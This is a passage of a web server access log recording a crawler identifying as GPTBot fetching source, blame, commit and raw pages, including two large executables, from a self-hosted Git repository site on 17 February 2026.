GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:14:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 805842] [Gzip 27.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:14:01:23 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" [Client 74.7.227.38] [Length 11504] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 21023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" +[17/Feb/2026:14:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" [Client 74.7.227.38] [Length 9836] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" [Client 74.7.227.38] [Length 11650] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:14:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" [Client 74.7.227.38] [Length 11641] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:14:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" [Client 74.7.227.38] [Length 11657] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:14:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" [Client 74.7.227.38] [Length 12068] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:14:01:27 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" +[17/Feb/2026:14:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/packages" [Client 74.7.227.38] [Length 7410] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:14:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13958] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" +[17/Feb/2026:14:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" [Client 74.7.227.38] [Length 10634] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" +[17/Feb/2026:14:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" [Client 74.7.227.38] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" +[17/Feb/2026:14:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" [Client 74.7.227.38] [Length 334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" +[17/Feb/2026:14:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16501] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" +[17/Feb/2026:14:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" +[17/Feb/2026:14:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" +[17/Feb/2026:14:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" +[17/Feb/2026:14:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist" [Client 74.7.227.38] [Length 9969] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build" [Client 74.7.227.38] [Length 9875] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 18074] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" [Client 74.7.227.38] [Length 11787] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 10824] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 10824] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 12186] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 12228] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" +[17/Feb/2026:14:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" +[17/Feb/2026:14:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" +[17/Feb/2026:14:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist" [Client 74.7.227.38] [Length 9872] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist" +[17/Feb/2026:14:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build" +[17/Feb/2026:14:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 6846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" +[17/Feb/2026:14:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" [Client 74.7.227.38] [Length 423] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" +[17/Feb/2026:14:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" +[17/Feb/2026:14:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 44945749] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" +[17/Feb/2026:14:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:14:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" +[17/Feb/2026:14:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" +[17/Feb/2026:14:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" +[17/Feb/2026:14:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:14:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" +[17/Feb/2026:14:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" +[17/Feb/2026:14:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 11341] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:14:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 9450] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" +[17/Feb/2026:14:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:14:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:14:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" +[17/Feb/2026:14:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" +[17/Feb/2026:14:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 9456] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:14:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 11438] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" +[17/Feb/2026:14:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 10784] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" [Client 74.7.227.38] [Length 19736] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 